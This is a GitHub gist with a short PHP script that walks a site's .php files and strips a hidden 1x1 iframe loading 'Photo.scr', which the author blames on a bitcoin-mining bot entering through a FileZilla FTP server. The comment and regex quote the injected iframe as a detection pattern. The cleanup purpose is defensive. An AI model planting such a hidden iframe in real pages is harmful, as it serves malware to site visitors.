Created
November 27, 2018 03:21
-
-
Save myself379/3ac53051b37f1396fbe387dc32f18f61 to your computer and use it in GitHub Desktop.
Somehow hardening for FTP is difficult, FileZilla FTP Server is not harden well enough and prone to bot injecting Photo.scr for bitcoin mining. This is the way to remove the iframe code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Run it as root/administrator, just php cleanPhotoscrMalware.php | |
* Clean to target the stupid Photo.scr miner, for it to work, note that its searching for CRLF | |
* | |
* The real infectious code look like this as below: | |
* | |
* <iframe src=Photo.scr width=1 height=1 frameborder=0> | |
* <\/iframe> | |
* | |
* Would be best to turn off the FTP server, even password protected seems not hardening. | |
*/ | |
foreach(rglob("*.php") as $virusFile){ | |
$withVirus = file_get_contents($virusFile); | |
$withoutVirus = preg_replace('/<iframe src=Photo.scr width=1 height=1 frameborder=0> | |
<\/iframe>/', '', $withVirus); | |
file_put_contents($virusFile, $withoutVirus); | |
} | |
function glob_recursive($pattern, $flags = 0){ | |
$files = glob($pattern, $flags); | |
foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) as $dir){ | |
$files = array_merge($files, glob_recursive($dir.'/'.basename($pattern), $flags)); | |
} | |
return $files; | |
} | |
function rglob($pattern, $flags = 0){ | |
// forked from https://github.com/rodurma/PHP-Functions/ | |
// blob/master/glob_recursive.php | |
$files = glob($pattern, $flags); | |
foreach (glob(dirname($pattern).'/*', | |
GLOB_ONLYDIR|GLOB_NOSORT) as $dir){ | |
$files = array_merge($files, glob_recursive | |
($dir.'/'.basename($pattern), $flags)); | |
} | |
return $files; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment